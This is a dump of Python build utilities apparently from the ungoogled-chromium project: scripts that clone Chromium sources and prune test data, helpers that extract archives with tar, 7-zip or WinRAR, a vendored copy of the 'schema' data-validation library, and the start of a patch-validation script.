], check=True) # Set up staging directory ucstaging.mkdir(exist_ok=True) get_logger().info('Cloning depot_tools') dt_commit = re.search(r"depot_tools\.git'\s*\+\s*'@'\s*\+\s*'([^']+)',", Path(args.output / 'DEPS').read_text()).group(1) if not dt_commit: get_logger().error('Unable to obtain commit for depot_tools checkout') sys.exit(1) if not dtpath.exists(): dtpath.mkdir() run(['git', 'init', '-q'], cwd=dtpath, check=True) run([ 'git', 'remote', 'add', 'origin', 'https://chromium.googlesource.com/chromium/tools/depot_tools' ], cwd=dtpath, check=True) run(['git', 'fetch', '--depth=1', 'origin', dt_commit], cwd=dtpath, check=True) run(['git', 'reset', '--hard', dt_commit], cwd=dtpath, check=True) run(['git', 'clean', '-ffdx'], cwd=dtpath, check=True) if iswin: (dtpath / 'git.bat').write_text('git') # Apply changes to gclient run(['git', 'apply'], input=Path(__file__).with_name('depot_tools.patch').read_text().replace( 'UC_OUT', str(args.output)).replace('UC_STAGING', str(ucstaging)), cwd=dtpath, check=True, universal_newlines=True) # gn requires full history to be able to generate last_commit_position.h get_logger().info('Cloning gn') if gnpath.exists(): run(['git', 'fetch'], cwd=gnpath, check=True) run(['git', 'reset', '--hard', 'FETCH_HEAD'], cwd=gnpath, check=True) run(['git', 'clean', '-ffdx'], cwd=gnpath, check=True) else: run(['git', 'clone', "https://gn.googlesource.com/gn", str(gnpath)], check=True) get_logger().info('Running gsync') if args.custom_config: copy(args.custom_config, ucstaging / '.gclient').replace('UC_OUT', str(args.output)) else: (ucstaging / '.gclient').write_text(GC_CONFIG.replace('UC_OUT', str(args.output))) gcpath = dtpath / 'gclient' if iswin: gcpath = gcpath.with_suffix('.bat') # -f, -D, and -R forces a hard reset on changes and deletes deps that have been removed run([ str(gcpath), 'sync', '-f', '-D', '-R', '--no-history', '--nohooks', f'--sysroot={args.sysroot}' ], check=True) # Follow tarball procedure: # https://source.chromium.org/chromium/chromium/tools/build/+/main:recipes/recipes/publish_tarball.py get_logger().info('Downloading pgo profiles') run([ sys.executable, str(args.output / 'tools' / 'update_pgo_profiles.py'), '--target=' + args.pgo, 'update', '--gs-url-base=chromium-optimization-profiles/pgo_profiles' ], check=True) # https://chromium-review.googlesource.com/c/chromium/tools/build/+/4380399 run([ sys.executable, str(args.output / 'v8' / 'tools' / 'builtins-pgo' / 'download_profiles.py'), 'download', '--depot-tools', str(dtpath) ], check=True) get_logger().info('Generating: DAWN_VERSION') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-s', str(args.output / 'third_party' / 'dawn'), '--revision', str(args.output / 'gpu' / 'webgpu' / 'DAWN_VERSION') ], check=True) get_logger().info('Generating: LASTCHANGE') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-o', str(args.output / 'build' / 'util' / 'LASTCHANGE') ], check=True) get_logger().info('Generating: gpu_lists_version.h') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-m', 'GPU_LISTS_VERSION', '--revision-id-only', '--header', str(args.output / 'gpu' / 'config' / 'gpu_lists_version.h') ], check=True) get_logger().info('Generating: skia_commit_hash.h') run([ sys.executable, str(args.output / 'build' / 'util' / 'lastchange.py'), '-m', 'SKIA_COMMIT_HASH', '-s', str(args.output / 'third_party' / 'skia'), '--header', str(args.output / 'skia' / 'ext' / 'skia_commit_hash.h') ], check=True) 
get_logger().info('Generating: last_commit_position.h') run([sys.executable, str(gnpath / 'build' / 'gen.py')], check=True) for item in gnpath.iterdir(): if not item.is_dir(): copy(item, args.output / 'tools' / 'gn') elif item.name != '.git' and item.name != 'out': copytree(item, args.output / 'tools' / 'gn' / item.name) move(str(gnpath / 'out' / 'last_commit_position.h'), str(args.output / 'tools' / 'gn' / 'bootstrap')) get_logger().info('Removing uneeded files') # Match removals for the tarball: # https://source.chromium.org/chromium/chromium/tools/build/+/main:recipes/recipe_modules/chromium/resources/export_tarball.py remove_dirs = ( (args.output / 'chrome' / 'test' / 'data'), (args.output / 'content' / 'test' / 'data'), (args.output / 'courgette' / 'testdata'), (args.output / 'extensions' / 'test' / 'data'), (args.output / 'media' / 'test' / 'data'), (args.output / 'native_client' / 'src' / 'trusted' / 'service_runtime' / 'testdata'), (args.output / 'third_party' / 'blink' / 'tools'), (args.output / 'third_party' / 'blink' / 'web_tests'), (args.output / 'third_party' / 'breakpad' / 'breakpad' / 'src' / 'processor' / 'testdata'), (args.output / 'third_party' / 'catapult' / 'tracing' / 'test_data'), (args.output / 'third_party' / 'hunspell' / 'tests'), (args.output / 'third_party' / 'hunspell_dictionaries'), (args.output / 'third_party' / 'jdk' / 'current'), (args.output / 'third_party' / 'jdk' / 'extras'), (args.output / 'third_party' / 'liblouis' / 'src' / 'tests' / 'braille-specs'), (args.output / 'third_party' / 'xdg-utils' / 'tests'), (args.output / 'v8' / 'test'), ) keep_files = ( (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'i18n_process_css_test.html'), (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'mojo' / 'foobar.mojom'), (args.output / 'chrome' / 'test' / 'data' / 'webui' / 'web_ui_test.mojom'), (args.output / 'v8' / 'test' / 'torque' / 'test-torque.tq'), ) keep_suffix = ('.gn', '.gni', '.grd', '.gyp', '.isolate', '.pydeps') # Include Contingent Paths for cpath in CONTINGENT_PATHS: if args.sysroot and f'{args.sysroot}-sysroot' in cpath: continue remove_dirs += (args.output / Path(cpath), ) for remove_dir in remove_dirs: for path in sorted(remove_dir.rglob('*'), key=lambda l: len(str(l)), reverse=True): if path.is_file() and path not in keep_files and path.suffix not in keep_suffix: try: path.unlink() # read-only files can't be deleted on Windows # so remove the flag and try again. except PermissionError: path.chmod(S_IWRITE) path.unlink() elif path.is_dir() and not any(path.iterdir()): try: path.rmdir() except PermissionError: path.chmod(S_IWRITE) path.rmdir() for path in sorted(args.output.rglob('*'), key=lambda l: len(str(l)), reverse=True): if not path.is_symlink() and '.git' not in path.parts: if path.is_file() and ('out' in path.parts or path.name.startswith('ChangeLog')): try: path.unlink() except PermissionError: path.chmod(S_IWRITE) path.unlink() elif path.is_dir() and not any(path.iterdir()): try: path.rmdir() except PermissionError: path.chmod(S_IWRITE) path.rmdir() get_logger().info('Source cloning complete') def main(): """CLI Entrypoint""" parser = ArgumentParser(description=__doc__) parser.add_argument('-o', '--output', type=Path, metavar='DIRECTORY', default='chromium', help='Output directory for the cloned sources. 
Default: %(default)s') parser.add_argument('-c', '--custom-config', type=Path, metavar='FILE', help='Supply a replacement for the default gclient config.') parser.add_argument('-p', '--pgo', default='linux', choices=('linux', 'mac', 'mac-arm', 'win32', 'win64'), help='Specifiy which pgo profile to download. Default: %(default)s') parser.add_argument('-s', '--sysroot', choices=('amd64', 'arm64', 'armhf', 'i386', 'mips64el', 'mipsel'), help='Download a linux sysroot for the given architecture') add_common_params(parser) args = parser.parse_args() clone(args) if __name__ == '__main__': main() File: utils/_extraction.py # -*- coding: UTF-8 -*- # Copyright (c) 2019 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Archive extraction utilities """ import os import shutil import subprocess import tarfile from pathlib import Path, PurePosixPath from _common import (USE_REGISTRY, PlatformEnum, ExtractorEnum, get_logger, get_running_platform) from prune_binaries import CONTINGENT_PATHS DEFAULT_EXTRACTORS = { ExtractorEnum.SEVENZIP: USE_REGISTRY, ExtractorEnum.TAR: 'tar', ExtractorEnum.WINRAR: USE_REGISTRY, } def _find_7z_by_registry(): """ Return a string to 7-zip's 7z.exe from the Windows Registry. """ import winreg #pylint: disable=import-error, import-outside-toplevel sub_key_7zfm = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\7zFM.exe' try: with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key_7zfm) as key_handle: sevenzipfm_dir = winreg.QueryValueEx(key_handle, 'Path')[0] except OSError: get_logger().exception('Unable to locate 7-zip from the Windows Registry') raise sevenzip_path = Path(sevenzipfm_dir, '7z.exe') if not sevenzip_path.is_file(): get_logger().error('7z.exe not found at path from registry: %s', sevenzip_path) return sevenzip_path def _find_winrar_by_registry(): """ Return a string to WinRAR's WinRAR.exe from the Windows Registry. """ import winreg #pylint: disable=import-error, import-outside-toplevel sub_key_winrar = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\WinRAR.exe' try: with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key_winrar) as key_handle: winrar_dir = winreg.QueryValueEx(key_handle, 'Path')[0] except OSError: get_logger().exception('Unable to locale WinRAR from the Windows Registry') raise winrar_path = Path(winrar_dir, 'WinRAR.exe') if not winrar_path.is_file(): get_logger().error('WinRAR.exe not found at path from registry: %s', winrar_path) return winrar_path def _find_extractor_by_cmd(extractor_cmd): """Returns a string path to the binary; None if it couldn't be found""" if not extractor_cmd: return None if Path(extractor_cmd).is_file(): return extractor_cmd return shutil.which(extractor_cmd) def _process_relative_to(unpack_root, relative_to): """ For an extractor that doesn't support an automatic transform, move the extracted contents from the relative_to/ directory to the unpack_root If relative_to is None, nothing is done. 
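
    Illustrative example (the archive layout shown is hypothetical): if an archive was
    unpacked to unpack_root/chromium-1.2.3.4/..., then

        _process_relative_to(unpack_root, Path('chromium-1.2.3.4'))

    moves the contents of chromium-1.2.3.4/ directly under unpack_root and removes the
    then-empty chromium-1.2.3.4 directory.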
""" if relative_to is None: return relative_root = unpack_root / relative_to if not relative_root.is_dir(): get_logger().error('Could not find relative_to directory in extracted files: %s', relative_to) raise Exception() for src_path in relative_root.iterdir(): dest_path = unpack_root / src_path.name src_path.rename(dest_path) relative_root.rmdir() def _extract_tar_with_7z(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using 7-zip extractor') if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd1 = (binary, 'x', str(archive_path), '-so') cmd2 = (binary, 'x', '-si', '-aoa', '-ttar', '-o{}'.format(str(output_dir))) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd2 += ('-x!%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('7z command line: %s | %s', ' '.join(cmd1), ' '.join(cmd2)) proc1 = subprocess.Popen(cmd1, stdout=subprocess.PIPE) proc2 = subprocess.Popen(cmd2, stdin=proc1.stdout, stdout=subprocess.PIPE) proc1.stdout.close() (stdout_data, stderr_data) = proc2.communicate() if proc2.returncode != 0: get_logger().error('7z commands returned non-zero status: %s', proc2.returncode) get_logger().debug('stdout: %s', stdout_data) get_logger().debug('stderr: %s', stderr_data) raise Exception() _process_relative_to(output_dir, relative_to) def _extract_tar_with_tar(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using BSD or GNU tar extractor') output_dir.mkdir(exist_ok=True) cmd = (binary, '-xf', str(archive_path), '-C', str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('--exclude=%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('tar command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('tar command returned %s', result.returncode) raise Exception() # for gnu tar, the --transform option could be used. but to keep compatibility with # bsdtar on macos, we just do this ourselves _process_relative_to(output_dir, relative_to) def _extract_tar_with_winrar(binary, archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using WinRAR extractor') output_dir.mkdir(exist_ok=True) cmd = (binary, 'x', '-o+', str(archive_path), str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x%s%s%s' % (str(relative_to), os.sep, cpath[:-1].replace('/')), ) get_logger().debug('WinRAR command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('WinRAR command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) def _extract_tar_with_python(archive_path, output_dir, relative_to, skip_unused, sysroot): get_logger().debug('Using pure Python tar extractor') class NoAppendList(list): """Hack to workaround memory issues with large tar files""" def append(self, obj): pass # Simple hack to check if symlinks are supported try: os.symlink('', '') except FileNotFoundError: # Symlinks probably supported symlink_supported = True except OSError: # Symlinks probably not supported get_logger().info('System does not support symlinks. 
Ignoring them.') symlink_supported = False except BaseException: # Unexpected exception get_logger().exception('Unexpected exception during symlink support check.') raise with tarfile.open(str(archive_path), 'r|%s' % archive_path.suffix[1:]) as tar_file_obj: tar_file_obj.members = NoAppendList() for tarinfo in tar_file_obj: try: if skip_unused and [ cpath for cpath in CONTINGENT_PATHS if tarinfo.name.startswith(str(relative_to) + '/' + cpath) and not (sysroot and f'{sysroot}-sysroot' in cpath) ]: continue if relative_to is None: destination = output_dir / PurePosixPath(tarinfo.name) else: destination = output_dir / PurePosixPath(tarinfo.name).relative_to(relative_to) if tarinfo.issym() and not symlink_supported: # In this situation, TarFile.makelink() will try to create a copy of the # target. But this fails because TarFile.members is empty # But if symlinks are not supported, it's safe to assume that symlinks # aren't needed. The only situation where this happens is on Windows. continue if tarinfo.islnk(): # Derived from TarFile.extract() new_target = output_dir / PurePosixPath( tarinfo.linkname).relative_to(relative_to) tarinfo._link_target = new_target.as_posix() # pylint: disable=protected-access if destination.is_symlink(): destination.unlink() tar_file_obj._extract_member(tarinfo, str(destination)) # pylint: disable=protected-access except BaseException: get_logger().exception('Exception thrown for tar member: %s', tarinfo.name) raise def extract_tar_file(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract regular or compressed tar archive into the output directory. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive, or None if no path components should be stripped. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip and WinRAR. """ if extractors is None: extractors = DEFAULT_EXTRACTORS current_platform = get_running_platform() if current_platform == PlatformEnum.WINDOWS: # Try to use 7-zip first sevenzip_cmd = extractors.get(ExtractorEnum.SEVENZIP) if sevenzip_cmd == USE_REGISTRY: sevenzip_cmd = str(_find_7z_by_registry()) sevenzip_bin = _find_extractor_by_cmd(sevenzip_cmd) if sevenzip_bin is not None: _extract_tar_with_7z(sevenzip_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return # Use WinRAR if 7-zip is not found winrar_cmd = extractors.get(ExtractorEnum.WINRAR) if winrar_cmd == USE_REGISTRY: winrar_cmd = str(_find_winrar_by_registry()) winrar_bin = _find_extractor_by_cmd(winrar_cmd) if winrar_bin is not None: _extract_tar_with_winrar(winrar_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return get_logger().warning( 'Neither 7-zip nor WinRAR were found. Falling back to Python extractor...') elif current_platform == PlatformEnum.UNIX: # NOTE: 7-zip isn't an option because it doesn't preserve file permissions tar_bin = _find_extractor_by_cmd(extractors.get(ExtractorEnum.TAR)) if not tar_bin is None: _extract_tar_with_tar(tar_bin, archive_path, output_dir, relative_to, skip_unused, sysroot) return else: # This is not a normal code path, so make it clear. 
raise NotImplementedError(current_platform) # Fallback to Python-based extractor on all platforms _extract_tar_with_python(archive_path, output_dir, relative_to, skip_unused, sysroot) def extract_with_7z(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract archives with 7-zip into the output directory. Only supports archives with one layer of unpacking, so compressed tar archives don't work. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for 7-Zip. """ # TODO: It would be nice to extend this to support arbitrary standard IO chaining of 7z # instances, so _extract_tar_with_7z and other future formats could use this. if extractors is None: extractors = DEFAULT_EXTRACTORS sevenzip_cmd = extractors.get(ExtractorEnum.SEVENZIP) if sevenzip_cmd == USE_REGISTRY: if not get_running_platform() == PlatformEnum.WINDOWS: get_logger().error('"%s" for 7-zip is only available on Windows', sevenzip_cmd) raise Exception() sevenzip_cmd = str(_find_7z_by_registry()) sevenzip_bin = _find_extractor_by_cmd(sevenzip_cmd) if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd = (sevenzip_bin, 'x', str(archive_path), '-aoa', '-o{}'.format(str(output_dir))) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x!%s/%s' % (str(relative_to), cpath[:-1]), ) get_logger().debug('7z command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('7z command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) def extract_with_winrar(archive_path, output_dir, relative_to, skip_unused, sysroot, extractors=None): """ Extract archives with WinRAR into the output directory. Only supports archives with one layer of unpacking, so compressed tar archives don't work. archive_path is the pathlib.Path to the archive to unpack output_dir is a pathlib.Path to the directory to unpack. It must already exist. relative_to is a pathlib.Path for directories that should be stripped relative to the root of the archive. extractors is a dictionary of PlatformEnum to a command or path to the extractor binary. Defaults to 'tar' for tar, and '_use_registry' for WinRAR. 
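
    Example (an illustrative sketch; the archive, output, and WinRAR install paths are
    hypothetical):

        extract_with_winrar(archive_path=Path('downloads/example.zip'),
                            output_dir=Path('build/src/third_party/example'),
                            relative_to=Path('example-1.0'),
                            skip_unused=False,
                            sysroot=None,
                            extractors={ExtractorEnum.WINRAR: 'C:/Program Files/WinRAR/WinRAR.exe'})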
""" if extractors is None: extractors = DEFAULT_EXTRACTORS winrar_cmd = extractors.get(ExtractorEnum.WINRAR) if winrar_cmd == USE_REGISTRY: if not get_running_platform() == PlatformEnum.WINDOWS: get_logger().error('"%s" for WinRAR is only available on Windows', winrar_cmd) raise Exception() winrar_cmd = str(_find_winrar_by_registry()) winrar_bin = _find_extractor_by_cmd(winrar_cmd) if not relative_to is None and (output_dir / relative_to).exists(): get_logger().error('Temporary unpacking directory already exists: %s', output_dir / relative_to) raise Exception() cmd = (winrar_bin, 'x', '-o+', str(archive_path), str(output_dir)) if skip_unused: for cpath in CONTINGENT_PATHS: if sysroot and f'{sysroot}-sysroot' in cpath: continue cmd += ('-x%s%s%s' % (str(relative_to), os.sep, cpath[:-1].replace('/', os.sep)), ) get_logger().debug('WinRAR command line: %s', ' '.join(cmd)) result = subprocess.run(cmd, check=False) if result.returncode != 0: get_logger().error('WinRAR command returned %s', result.returncode) raise Exception() _process_relative_to(output_dir, relative_to) File: utils/third_party/__init__.py File: utils/third_party/schema.py """schema is a library for validating Python data structures, such as those obtained from config-files, forms, external services or command-line parsing, converted from JSON/YAML (or something else) to Python data-types.""" import re __version__ = '0.6.7' __all__ = ['Schema', 'And', 'Or', 'Regex', 'Optional', 'Use', 'Forbidden', 'Const', 'SchemaError', 'SchemaWrongKeyError', 'SchemaMissingKeyError', 'SchemaForbiddenKeyError', 'SchemaUnexpectedTypeError'] class SchemaError(Exception): """Error during Schema validation.""" def __init__(self, autos, errors=None): self.autos = autos if type(autos) is list else [autos] self.errors = errors if type(errors) is list else [errors] Exception.__init__(self, self.code) @property def code(self): """ Removes duplicates values in auto and error list. parameters. """ def uniq(seq): """ Utility function that removes duplicate. """ seen = set() seen_add = seen.add # This way removes duplicates while preserving the order. return [x for x in seq if x not in seen and not seen_add(x)] data_set = uniq(i for i in self.autos if i is not None) error_list = uniq(i for i in self.errors if i is not None) if error_list: return '\n'.join(error_list) return '\n'.join(data_set) class SchemaWrongKeyError(SchemaError): """Error Should be raised when an unexpected key is detected within the data set being.""" pass class SchemaMissingKeyError(SchemaError): """Error should be raised when a mandatory key is not found within the data set being vaidated""" pass class SchemaForbiddenKeyError(SchemaError): """Error should be raised when a forbidden key is found within the data set being validated, and its value matches the value that was specified""" pass class SchemaUnexpectedTypeError(SchemaError): """Error should be raised when a type mismatch is detected within the data set being validated.""" pass class And: """ Utility function to combine validation directives in AND Boolean fashion. """ def __init__(self, *args, **kw): self._args = args assert set(kw).issubset(['error', 'schema', 'ignore_extra_keys']) self._error = kw.get('error') self._ignore_extra_keys = kw.get('ignore_extra_keys', False) # You can pass your inherited Schema class. 
self._schema = kw.get('schema', Schema) def __repr__(self): return '%s(%s)' % (self.__class__.__name__, ', '.join(repr(a) for a in self._args)) def validate(self, data): """ Validate data using defined sub schema/expressions ensuring all values are valid. :param data: to be validated with sub defined schemas. :return: returns validated data """ for s in [self._schema(s, error=self._error, ignore_extra_keys=self._ignore_extra_keys) for s in self._args]: data = s.validate(data) return data class Or(And): """Utility function to combine validation directives in a OR Boolean fashion.""" def validate(self, data): """ Validate data using sub defined schema/expressions ensuring at least one value is valid. :param data: data to be validated by provided schema. :return: return validated data if not validation """ x = SchemaError([], []) for s in [self._schema(s, error=self._error, ignore_extra_keys=self._ignore_extra_keys) for s in self._args]: try: return s.validate(data) except SchemaError as _x: x = _x raise SchemaError(['%r did not validate %r' % (self, data)] + x.autos, [self._error.format(data) if self._error else None] + x.errors) class Regex: """ Enables schema.py to validate string using regular expressions. """ # Map all flags bits to a more readable description NAMES = ['re.ASCII', 're.DEBUG', 're.VERBOSE', 're.UNICODE', 're.DOTALL', 're.MULTILINE', 're.LOCALE', 're.IGNORECASE', 're.TEMPLATE'] def __init__(self, pattern_str, flags=0, error=None): self._pattern_str = pattern_str flags_list = [Regex.NAMES[i] for i, f in # Name for each bit enumerate('{0:09b}'.format(flags)) if f != '0'] if flags_list: self._flags_names = ', flags=' + '|'.join(flags_list) else: self._flags_names = '' self._pattern = re.compile(pattern_str, flags=flags) self._error = error def __repr__(self): return '%s(%r%s)' % ( self.__class__.__name__, self._pattern_str, self._flags_names ) def validate(self, data): """ Validated data using defined regex. :param data: data to be validated :return: return validated data. """ e = self._error try: if self._pattern.search(data): return data else: raise SchemaError('%r does not match %r' % (self, data), e) except TypeError: raise SchemaError('%r is not string nor buffer' % data, e) class Use: """ For more general use cases, you can use the Use class to transform the data while it is being validate. """ def __init__(self, callable_, error=None): assert callable(callable_) self._callable = callable_ self._error = error def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self._callable) def validate(self, data): try: return self._callable(data) except SchemaError as x: raise SchemaError([None] + x.autos, [self._error.format(data) if self._error else None] + x.errors) except BaseException as x: f = _callable_str(self._callable) raise SchemaError('%s(%r) raised %r' % (f, data, x), self._error.format(data) if self._error else None) COMPARABLE, CALLABLE, VALIDATOR, TYPE, DICT, ITERABLE = range(6) def _priority(s): """Return priority for a given object.""" if type(s) in (list, tuple, set, frozenset): return ITERABLE if type(s) is dict: return DICT if issubclass(type(s), type): return TYPE if hasattr(s, 'validate'): return VALIDATOR if callable(s): return CALLABLE else: return COMPARABLE class Schema: """ Entry point of the library, use this class to instantiate validation schema for the data that will be validated. 
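
    Example (illustrative values, not taken from this repository's configuration schemas):

        >>> conf_schema = Schema({'name': And(str, len),
        ...                       Optional('retries', default=3): Use(int)})
        >>> conf_schema.validate({'name': 'example'})
        {'name': 'example', 'retries': 3}

    A validation failure raises SchemaError or one of its subclasses defined above.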
""" def __init__(self, schema, error=None, ignore_extra_keys=False): self._schema = schema self._error = error self._ignore_extra_keys = ignore_extra_keys def __repr__(self): return '%s(%r)' % (self.__class__.__name__, self._schema) @staticmethod def _dict_key_priority(s): """Return priority for a given key object.""" if isinstance(s, Forbidden): return _priority(s._schema) - 0.5 if isinstance(s, Optional): return _priority(s._schema) + 0.5 return _priority(s) def validate(self, data): Schema = self.__class__ s = self._schema e = self._error i = self._ignore_extra_keys flavor = _priority(s) if flavor == ITERABLE: data = Schema(type(s), error=e).validate(data) o = Or(*s, error=e, schema=Schema, ignore_extra_keys=i) return type(data)(o.validate(d) for d in data) if flavor == DICT: data = Schema(dict, error=e).validate(data) new = type(data)() # new - is a dict of the validated values coverage = set() # matched schema keys # for each key and value find a schema entry matching them, if any sorted_skeys = sorted(s, key=self._dict_key_priority) for key, value in data.items(): for skey in sorted_skeys: svalue = s[skey] try: nkey = Schema(skey, error=e).validate(key) except SchemaError: pass else: if isinstance(skey, Forbidden): # As the content of the value makes little sense for # forbidden keys, we reverse its meaning: # we will only raise the SchemaErrorForbiddenKey # exception if the value does match, allowing for # excluding a key only if its value has a certain type, # and allowing Forbidden to work well in combination # with Optional. try: nvalue = Schema(svalue, error=e).validate(value) except SchemaError: continue raise SchemaForbiddenKeyError( 'Forbidden key encountered: %r in %r' % (nkey, data), e) try: nvalue = Schema(svalue, error=e, ignore_extra_keys=i).validate(value) except SchemaError as x: k = "Key '%s' error:" % nkey raise SchemaError([k] + x.autos, [e] + x.errors) else: new[nkey] = nvalue coverage.add(skey) break required = {k for k in s if type(k) not in [Optional, Forbidden]} if not required.issubset(coverage): missing_keys = required - coverage s_missing_keys = \ ', '.join(repr(k) for k in sorted(missing_keys, key=repr)) raise \ SchemaMissingKeyError('Missing keys: ' + s_missing_keys, e) if not self._ignore_extra_keys and (len(new) != len(data)): wrong_keys = set(data.keys()) - set(new.keys()) s_wrong_keys = \ ', '.join(repr(k) for k in sorted(wrong_keys, key=repr)) raise \ SchemaWrongKeyError( 'Wrong keys %s in %r' % (s_wrong_keys, data), e.format(data) if e else None) # Apply default-having optionals that haven't been used: defaults = {k for k in s if type(k) is Optional and hasattr(k, 'default')} - coverage for default in defaults: new[default.key] = default.default return new if flavor == TYPE: if isinstance(data, s): return data else: raise SchemaUnexpectedTypeError( '%r should be instance of %r' % (data, s.__name__), e.format(data) if e else None) if flavor == VALIDATOR: try: return s.validate(data) except SchemaError as x: raise SchemaError([None] + x.autos, [e] + x.errors) except BaseException as x: raise SchemaError( '%r.validate(%r) raised %r' % (s, data, x), self._error.format(data) if self._error else None) if flavor == CALLABLE: f = _callable_str(s) try: if s(data): return data except SchemaError as x: raise SchemaError([None] + x.autos, [e] + x.errors) except BaseException as x: raise SchemaError( '%s(%r) raised %r' % (f, data, x), self._error.format(data) if self._error else None) raise SchemaError('%s(%r) should evaluate to True' % (f, data), e) if s == 
data: return data else: raise SchemaError('%r does not match %r' % (s, data), e.format(data) if e else None) class Optional(Schema): """Marker for an optional part of the validation Schema.""" _MARKER = object() def __init__(self, *args, **kwargs): default = kwargs.pop('default', self._MARKER) super(Optional, self).__init__(*args, **kwargs) if default is not self._MARKER: # See if I can come up with a static key to use for myself: if _priority(self._schema) != COMPARABLE: raise TypeError( 'Optional keys with defaults must have simple, ' 'predictable values, like literal strings or ints. ' '"%r" is too complex.' % (self._schema,)) self.default = default self.key = self._schema def __hash__(self): return hash(self._schema) def __eq__(self, other): return (self.__class__ is other.__class__ and getattr(self, 'default', self._MARKER) == getattr(other, 'default', self._MARKER) and self._schema == other._schema) class Forbidden(Schema): def __init__(self, *args, **kwargs): super(Forbidden, self).__init__(*args, **kwargs) self.key = self._schema class Const(Schema): def validate(self, data): super(Const, self).validate(data) return data def _callable_str(callable_): if hasattr(callable_, '__name__'): return callable_.__name__ return str(callable_) File: devutils/validate_patches.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright (c) 2020 The ungoogled-chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Validates that all patches apply cleanly against the source tree. The required source tree files can be retrieved from Google directly. """ import argparse import ast import base64 import email.utils import json import logging import sys import tempfile from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent / 'third_party')) import unidiff from unidiff.constants import LINE_TYPE_EMPTY, LINE_TYPE_NO_NEWLINE sys.path.pop(0) sys.path.insert(0, str(Path(__file__).resolve().parent.parent / 'utils')) from domain_substitution import TREE_ENCODINGS from _common import ENCODING, get_logger, get_chromium_version, parse_series, add_common_params from patches import dry_run_check sys.path.pop(0) try: import requests import requests.adapters import urllib3.util class _VerboseRetry(urllib3.util.Retry): """A more verbose version of HTTP Adatper about retries""" def sleep_for_retry(self, response=None): """Sleeps for Retry-After, and logs the sleep time""" if response: retry_after = self.get_retry_after(response) if retry_after: get_logger().info( 'Got HTTP status %s with Retry-After header. Retrying after %s seconds...', response.status, retry_after) else: get_logger().info( 'Could not find Retry-After header for HTTP response %s. Status reason: %s', response.status, response.reason) return super().sleep_for_retry(response) def _sleep_backoff(self): """Log info about backoff sleep""" get_logger().info('Running HTTP request sleep backoff') super()._sleep_backoff() def _get_requests_session(): session = requests.Session() http_adapter = requests.adapters.HTTPAdapter( max_retries=_VerboseRetry(total=10, read=10, connect=10, backoff_factor=8, status_forcelist=urllib3.Retry.RETRY_AFTER_STATUS_CODES, raise_on_status=False)) session.mount('http://', http_adapter) session.mount('https://', http_adapter) return session except ImportError: def _get_requests_session(): raise RuntimeError('The Python module "requests" is required for remote' 'file downloading. 
